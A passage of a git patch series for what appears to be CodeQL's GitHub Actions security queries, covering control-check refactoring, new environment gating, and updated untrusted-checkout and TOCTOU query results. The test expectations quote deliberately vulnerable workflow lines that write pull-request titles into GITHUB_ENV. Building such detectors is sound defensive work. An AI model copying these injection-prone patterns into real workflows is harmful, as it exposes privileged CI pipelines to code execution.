"PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test6.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | provenance | | nodes | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | @@ -36,5 +39,11 @@ nodes | .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test5.yml:10:9:30:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | semmle.label | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test6.yml:11:19:11:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | semmle.label | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | +| .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | semmle.label | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | +| .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | semmle.label | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | subpaths #select From 39bff38d700f5f0b5bcb169dd210db7956348800 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 28 Jun 2024 12:32:18 +0200 Subject: [PATCH 0369/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 30120f7d321..16c801a0bad 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.8 +version: 0.1.9 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index dad05ff4af3..4f1173bd9ad 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.8 +version: 0.1.9 groups: [actions, queries] suites: codeql-suites extractor: javascript From 1281ca8e813069d2367b0bc6198ba29543826e3f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 1 Jul 2024 23:01:38 +0200 Subject: [PATCH 0370/1267] Bump qlpack versions --- ql/lib/codeql/actions/Ast.qll | 11 +++ ql/lib/codeql/actions/ast/internal/Ast.qll | 28 +++++++ .../codeql/actions/security/ControlChecks.qll | 73 +++++++++++++++---- ql/lib/qlpack.yml | 2 +- .../Security/CWE-285/ImproperAccessControl.ql | 2 +- .../UntrustedCheckoutTOCTOUCritical.ql | 42 ++++++++--- .../CWE-367/UntrustedCheckoutTOCTOUHigh.ql | 40 +++++++--- .../CWE-829/UntrustedCheckoutCritical.ql | 8 +- .../Security/CWE-829/UntrustedCheckoutHigh.ql | 8 +- ql/src/qlpack.yml | 2 +- .../UntrustedCheckoutTOCTOUCritical.expected | 27 ++++++- .../UntrustedCheckoutCritical.expected | 24 +++--- .../CWE-829/UntrustedCheckoutHigh.expected | 41 +++++------ 13 files changed, 227 insertions(+), 81 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index e837c6fcb30..5e7c6d77c3e 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -198,6 +198,8 @@ abstract class Job extends AstNode instanceof JobImpl { If getIf() { result = super.getIf() } + Environment getEnvironment() { result = super.getEnvironment() } + Permissions getPermissions() { result = super.getPermissions() } Event getATriggerEvent() { result = super.getATriggerEvent() } @@ -242,6 +244,15 @@ class If extends AstNode instanceof IfImpl { string getConditionStyle() { result = super.getConditionStyle() } } +/** + * An Environemnt node representing a deployment environment. + */ +class Environment extends AstNode instanceof EnvironmentImpl { + string getName() { result = super.getName() } + + Expression getNameExpr() { result = super.getNameExpr() } +} + abstract class Uses extends AstNode instanceof UsesImpl { string getCallee() { result = super.getCallee() } diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 2deb987650c..9d2a5b38206 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -82,6 +82,7 @@ private newtype TAstNode = exists(YamlMapping m | m.lookup("steps").(YamlSequence).getElementNode(_) = n) } or TIfNode(YamlValue n) { exists(YamlMapping m | m.lookup("if") = n) } or + TEnvironmentNode(YamlValue n) { exists(YamlMapping m | m.lookup("environment") = n) } or TEnvNode(YamlMapping n) { exists(YamlMapping m | m.lookup("env") = n) } or TScalarValueNode(YamlScalar n) { exists(YamlMapping m | m.maps(_, n) or m.lookup(_).(YamlSequence).getElementNode(_) = n) @@ -793,6 +794,9 @@ class JobImpl extends AstNodeImpl, TJobNode { /** Gets the condition that must be satisfied for this job to run. */ IfImpl getIf() { result.getNode() = n.lookup("if") } + /** Gets the deployment environment to run the job on. */ + EnvironmentImpl getEnvironment() { result.getNode() = n.lookup("environment") } + /** Gets the permissions for this job. */ PermissionsImpl getPermissions() { result.getNode() = n.lookup("permissions") } @@ -976,6 +980,30 @@ class StepImpl extends AstNodeImpl, TStepNode { } } +class EnvironmentImpl extends AstNodeImpl, TEnvironmentNode { + YamlValue n; + + EnvironmentImpl() { this = TEnvironmentNode(n) } + + override string toString() { result = n.toString() } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + override AstNodeImpl getParentNode() { result.getAChildNode() = this } + + override string getAPrimaryQlClass() { result = "EnvironmentImpl" } + + override Location getLocation() { result = n.getLocation() } + + override YamlScalar getNode() { result = n } + + /** Gets the environment name. */ + string getName() { result = n.(YamlScalar).getValue() } + + /** Gets the environmen name. */ + ExpressionImpl getNameExpr() { result.getParentNode().getNode() = n } +} + class IfImpl extends AstNodeImpl, TIfNode { YamlValue n; diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/ql/lib/codeql/actions/security/ControlChecks.qll index fdafda1fc27..28bc938f8c8 100644 --- a/ql/lib/codeql/actions/security/ControlChecks.qll +++ b/ql/lib/codeql/actions/security/ControlChecks.qll @@ -1,17 +1,49 @@ import actions /** An If node that contains an actor, user or label check */ -abstract class ControlCheck extends If { +abstract class ControlCheck extends AstNode { + ControlCheck() { + this instanceof If or + this instanceof Environment or + this instanceof UsesStep + } + predicate dominates(Step step) { - step.getIf() = this or - step.getEnclosingJob().getIf() = this or - step.getEnclosingJob().getANeededJob().(LocalJob).getAStep().getIf() = this or - step.getEnclosingJob().getANeededJob().(LocalJob).getIf() = this + this instanceof If and + ( + step.getIf() = this or + step.getEnclosingJob().getIf() = this or + step.getEnclosingJob().getANeededJob().(LocalJob).getAStep().getIf() = this or + step.getEnclosingJob().getANeededJob().(LocalJob).getIf() = this + ) + or + this instanceof Environment and + ( + step.getEnclosingJob().getEnvironment() = this + or + step.getEnclosingJob().getANeededJob().getEnvironment() = this + ) + or + this.(UsesStep).getAFollowingStep() = step } } -class LabelControlCheck extends ControlCheck { - LabelControlCheck() { +abstract class AssociationCheck extends ControlCheck { } + +abstract class ActorCheck extends ControlCheck { } + +abstract class RepositoryCheck extends ControlCheck { } + +abstract class LabelCheck extends ControlCheck { } + +abstract class PermissionCheck extends ControlCheck { } + +class EnvironmentCheck extends ControlCheck instanceof Environment { + EnvironmentCheck() { any() } +} + +class LabelIfCheck extends LabelCheck instanceof If { + LabelIfCheck() { // eg: contains(github.event.pull_request.labels.*.name, 'safe to test') // eg: github.event.label.name == 'safe to test' exists( @@ -23,8 +55,8 @@ class LabelControlCheck extends ControlCheck { } } -class ActorControlCheck extends ControlCheck { - ActorControlCheck() { +class ActorIfCheck extends ActorCheck instanceof If { + ActorIfCheck() { // eg: github.actor == 'dependabot[bot]' // eg: github.triggering_actor == 'CI Agent' // eg: github.event.pull_request.user.login == 'mybot' @@ -39,8 +71,8 @@ class ActorControlCheck extends ControlCheck { } } -class RepositoryControlCheck extends ControlCheck { - RepositoryControlCheck() { +class RepositoryIfCheck extends RepositoryCheck instanceof If { + RepositoryIfCheck() { // eg: github.repository == 'test/foo' exists( normalizeExpr(this.getCondition()) @@ -49,8 +81,8 @@ class RepositoryControlCheck extends ControlCheck { } } -class AssociationControlCheck extends ControlCheck { - AssociationControlCheck() { +class AssociationIfCheck extends AssociationCheck instanceof If { + AssociationIfCheck() { // eg: contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) exists( normalizeExpr(this.getCondition()) @@ -63,3 +95,18 @@ class AssociationControlCheck extends ControlCheck { } } +class AssociationActionCheck extends AssociationCheck instanceof UsesStep { + AssociationActionCheck() { + this.getCallee() = "TheModdingInquisition/actions-team-membership" and + not exists(this.getArgument("exit")) + or + this.getArgument("exit") = "true" + } +} + +class PermissionActionCheck extends PermissionCheck instanceof UsesStep { + PermissionActionCheck() { + this.getCallee() = "lannonbr/repo-permission-check-action" and + not this.getArgument("permission") = ["write", "admin"] + } +} diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 16c801a0bad..5518e074d30 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.9 +version: 0.1.10 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/Security/CWE-285/ImproperAccessControl.ql b/ql/src/Security/CWE-285/ImproperAccessControl.ql index 16ae5c5fe9b..cd7cefe2dd3 100644 --- a/ql/src/Security/CWE-285/ImproperAccessControl.ql +++ b/ql/src/Security/CWE-285/ImproperAccessControl.ql @@ -14,7 +14,7 @@ import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.ControlChecks -from LocalJob job, LabelControlCheck check, MutableRefCheckoutStep checkout, Event event +from LocalJob job, LabelCheck check, MutableRefCheckoutStep checkout, Event event where job = checkout.getEnclosingJob() and job.isPrivileged() and diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql index 3a049f67dea..d28cca11a56 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql @@ -1,7 +1,7 @@ /** * @name Untrusted Checkout TOCTOU * @description Untrusted Checkout is protected by a security check but the checked-out branch can be changed after the check. - * @kind problem + * @kind path-problem * @problem.severity error * @precision high * @security-severity 9.3 @@ -16,21 +16,43 @@ import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps import codeql.actions.security.ControlChecks -from ControlCheck check, MutableRefCheckoutStep checkout +query predicate edges(Step a, Step b) { a.getAFollowingStep() = b } + +from LocalJob j, MutableRefCheckoutStep checkout, PoisonableStep s, ControlCheck check where - // the job can be triggered by an external user - inPrivilegedExternallyTriggerableJob(check) and + j = checkout.getEnclosingJob() and + j.getAStep() = checkout and + // the checkout is followed by a known poisonable step + checkout.getAFollowingStep() = s and + // the checkout occurs in a privileged context + ( + inPrivilegedCompositeAction(checkout) + or + inPrivilegedExternallyTriggerableJob(checkout) + ) and // the mutable checkout step is protected by an access check - check = [checkout.getIf(), checkout.getEnclosingJob().getIf()] and + check.dominates(checkout) and // the checked-out code may lead to arbitrary code execution checkout.getAFollowingStep() instanceof PoisonableStep and ( - // label gates do not depend on the triggering event - check instanceof LabelControlCheck + // environment gates do not depend on the triggering event + check instanceof EnvironmentCheck or - // actor or association gates apply to IssueOps only - (check instanceof AssociationControlCheck or check instanceof ActorControlCheck) and + // label gates do not depend on the triggering event + check instanceof LabelCheck + or + // actor or association gates are only bypassable for IssueOps + // since an attacker can wait for a privileged user to comment on an issue + // and then mutate the checked-out code. + // however, when used for pull_request_target, the check is not bypassable since + // the actor checked is the author of the PR + ( + check instanceof AssociationCheck or + check instanceof ActorCheck or + check instanceof PermissionCheck + ) and check.getEnclosingJob().getATriggerEvent().getName().matches("%_comment") ) -select checkout, "The checked-out code can be changed after the authorization check o step $@.", +select s, checkout, s, + "Insufficient protection against execution of untrusted code on a privileged workflow on check $@.", check, check.toString() diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql index b9a1e4c6301..6448f1a05a8 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql @@ -16,21 +16,37 @@ import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps import codeql.actions.security.ControlChecks -from ControlCheck check, MutableRefCheckoutStep checkout +from MutableRefCheckoutStep checkout, ControlCheck check where - // the job can be triggered by an external user - inPrivilegedExternallyTriggerableJob(check) and - // the mutable checkout step is protected by an access check - check = [checkout.getIf(), checkout.getEnclosingJob().getIf()] and - // there are no evidences that the checked-out code can lead to arbitrary code execution - not checkout.getAFollowingStep() instanceof PoisonableStep and + // the checkout occurs in a privileged context ( - // label gates do not depend on the triggering event - check instanceof LabelControlCheck + inPrivilegedCompositeAction(checkout) or - // actor or Association gates apply to IssueOps only - (check instanceof AssociationControlCheck or check instanceof ActorControlCheck) and + inPrivilegedExternallyTriggerableJob(checkout) + ) and + // there are no evidences that the checked-out gets executed + not checkout.getAFollowingStep() instanceof PoisonableStep and + // the mutable checkout step is protected by an access check + check.dominates(checkout) and + ( + // environment gates do not depend on the triggering event + check instanceof EnvironmentCheck + or + // label gates do not depend on the triggering event + check instanceof LabelCheck + or + // actor or association gates are only bypassable for IssueOps + // since an attacker can wait for a privileged user to comment on an issue + // and then mutate the checked-out code. + // however, when used for pull_request_target, the check is not bypassable since + // the actor checked is the author of the PR + ( + check instanceof AssociationCheck or + check instanceof ActorCheck or + check instanceof PermissionCheck + ) and check.getEnclosingJob().getATriggerEvent().getName().matches("%_comment") ) -select checkout, "The checked-out code can be changed after the authorization check o step $@.", +select checkout, + "Insufficient protection against execution of untrusted code on a privileged workflow on step $@.", check, check.toString() diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql index 3a87b30be97..c1d72dd4664 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql @@ -26,12 +26,12 @@ where j.getAStep() = checkout and // the checkout is followed by a known poisonable step checkout.getAFollowingStep() = s and - // the checkout is not controlled by an access check - not exists(ControlCheck check | check.dominates(checkout)) and // the checkout occurs in a privileged context ( inPrivilegedCompositeAction(checkout) or inPrivilegedExternallyTriggerableJob(checkout) - ) -select s, checkout, s, "Potential unsafe checkout of untrusted code on a privileged workflow." + ) and + // the checkout is not controlled by an access check + not exists(ControlCheck check | check.dominates(checkout)) +select s, checkout, s, "Execution of untrusted code on a privileged workflow." diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql index cb2f1cdaf95..468a1214c62 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql @@ -24,12 +24,12 @@ where j.getAStep() = checkout and // the checkout is NOT followed by a known poisonable step not checkout.getAFollowingStep() instanceof PoisonableStep and - // the checkout is not controlled by an access check - not exists(ControlCheck check | check.dominates(checkout)) and // the checkout occurs in a privileged context ( inPrivilegedCompositeAction(checkout) or inPrivilegedExternallyTriggerableJob(checkout) - ) -select checkout, "Potential unsafe checkout of untrusted pull request on privileged workflow." + ) and + // the checkout is not controlled by an access check + not exists(ControlCheck check | check.dominates(checkout)) +select checkout, "Potential execution of untrusted code on a privileged workflow." diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 4f1173bd9ad..d4f97a32ec6 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.9 +version: 0.1.10 groups: [actions, queries] suites: codeql-suites extractor: javascript diff --git a/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected b/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected index e3a42b3265d..01045ddde5e 100644 --- a/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected +++ b/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected @@ -1,2 +1,25 @@ -| .github/workflows/comment.yml:37:9:41:6 | Uses Step | The checked-out code can be changed after the authorization check o step $@. | .github/workflows/comment.yml:10:9:10:188 | ${{ git ... s ') }} | ${{ git ... s ') }} | -| .github/workflows/label.yml:13:9:17:6 | Uses Step | The checked-out code can be changed after the authorization check o step $@. | .github/workflows/label.yml:11:9:11:73 | contain ... -test') | contain ... -test') | +edges +| .github/workflows/actor.yml:17:9:20:6 | Uses Step | .github/workflows/actor.yml:20:9:21:16 | Run Step | +| .github/workflows/comment.yml:15:9:30:6 | Uses Step: issue | .github/workflows/comment.yml:30:9:34:6 | Uses Step | +| .github/workflows/comment.yml:15:9:30:6 | Uses Step: issue | .github/workflows/comment.yml:34:9:37:6 | Run Step | +| .github/workflows/comment.yml:15:9:30:6 | Uses Step: issue | .github/workflows/comment.yml:37:9:41:6 | Uses Step | +| .github/workflows/comment.yml:15:9:30:6 | Uses Step: issue | .github/workflows/comment.yml:41:9:41:43 | Run Step | +| .github/workflows/comment.yml:30:9:34:6 | Uses Step | .github/workflows/comment.yml:34:9:37:6 | Run Step | +| .github/workflows/comment.yml:30:9:34:6 | Uses Step | .github/workflows/comment.yml:37:9:41:6 | Uses Step | +| .github/workflows/comment.yml:30:9:34:6 | Uses Step | .github/workflows/comment.yml:41:9:41:43 | Run Step | +| .github/workflows/comment.yml:34:9:37:6 | Run Step | .github/workflows/comment.yml:37:9:41:6 | Uses Step | +| .github/workflows/comment.yml:34:9:37:6 | Run Step | .github/workflows/comment.yml:41:9:41:43 | Run Step | +| .github/workflows/comment.yml:37:9:41:6 | Uses Step | .github/workflows/comment.yml:41:9:41:43 | Run Step | +| .github/workflows/deployment.yml:16:10:22:7 | Uses Step | .github/workflows/deployment.yml:22:10:27:7 | Uses Step | +| .github/workflows/deployment.yml:16:10:22:7 | Uses Step | .github/workflows/deployment.yml:27:10:30:7 | Run Step | +| .github/workflows/deployment.yml:16:10:22:7 | Uses Step | .github/workflows/deployment.yml:30:10:31:53 | Run Step | +| .github/workflows/deployment.yml:22:10:27:7 | Uses Step | .github/workflows/deployment.yml:27:10:30:7 | Run Step | +| .github/workflows/deployment.yml:22:10:27:7 | Uses Step | .github/workflows/deployment.yml:30:10:31:53 | Run Step | +| .github/workflows/deployment.yml:27:10:30:7 | Run Step | .github/workflows/deployment.yml:30:10:31:53 | Run Step | +| .github/workflows/label.yml:13:9:17:6 | Uses Step | .github/workflows/label.yml:17:9:17:41 | Run Step | +| .github/workflows/label_actor.yml:13:9:17:6 | Uses Step | .github/workflows/label_actor.yml:17:9:17:41 | Run Step | +#select +| .github/workflows/comment.yml:41:9:41:43 | Run Step | .github/workflows/comment.yml:37:9:41:6 | Uses Step | .github/workflows/comment.yml:41:9:41:43 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow on check $@. | .github/workflows/comment.yml:10:9:10:188 | ${{ git ... s ') }} | ${{ git ... s ') }} | +| .github/workflows/deployment.yml:27:10:30:7 | Run Step | .github/workflows/deployment.yml:16:10:22:7 | Uses Step | .github/workflows/deployment.yml:27:10:30:7 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow on check $@. | .github/workflows/deployment.yml:13:19:13:27 | Public CI | Public CI | +| .github/workflows/deployment.yml:30:10:31:53 | Run Step | .github/workflows/deployment.yml:16:10:22:7 | Uses Step | .github/workflows/deployment.yml:30:10:31:53 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow on check $@. | .github/workflows/deployment.yml:13:19:13:27 | Public CI | Public CI | +| .github/workflows/label.yml:17:9:17:41 | Run Step | .github/workflows/label.yml:13:9:17:6 | Uses Step | .github/workflows/label.yml:17:9:17:41 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow on check $@. | .github/workflows/label.yml:11:9:11:73 | contain ... -test') | contain ... -test') | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 5f4ba7a7b98..87289c178af 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -312,15 +312,15 @@ edges | .github/workflows/untrusted_checkout.yml:16:9:20:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | | .github/workflows/workflow_run_untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/workflow_run_untrusted_checkout.yml:16:9:18:31 | Uses Step | #select -| .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | -| .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | -| .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | -| .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | -| .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | -| .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | -| .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | -| .github/workflows/mend.yml:29:9:33:28 | Uses Step | .github/workflows/mend.yml:22:9:29:6 | Uses Step | .github/workflows/mend.yml:29:9:33:28 | Uses Step | Potential unsafe checkout of untrusted code on a privileged workflow. | -| .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | Potential unsafe checkout of untrusted code on a privileged workflow. | -| .github/workflows/poc2.yml:52:9:58:24 | Run Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | -| .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | -| .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | +| .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/mend.yml:29:9:33:28 | Uses Step | .github/workflows/mend.yml:22:9:29:6 | Uses Step | .github/workflows/mend.yml:29:9:33:28 | Uses Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/poc2.yml:52:9:58:24 | Run Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Execution of untrusted code on a privileged workflow. | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected index 9015e85b3d0..3619941aa12 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected @@ -1,21 +1,20 @@ -| .github/workflows/issue_comment_3rd_party_action.yml:16:9:22:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/issue_comment_3rd_party_action.yml:30:9:36:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/issue_comment_3rd_party_action.yml:45:9:49:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/issue_comment_3rd_party_action.yml:49:9:52:25 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/issue_comment_direct.yml:12:9:16:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/issue_comment_direct.yml:20:9:24:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/issue_comment_direct.yml:28:9:32:2 | Uses Step | Potential unsafe 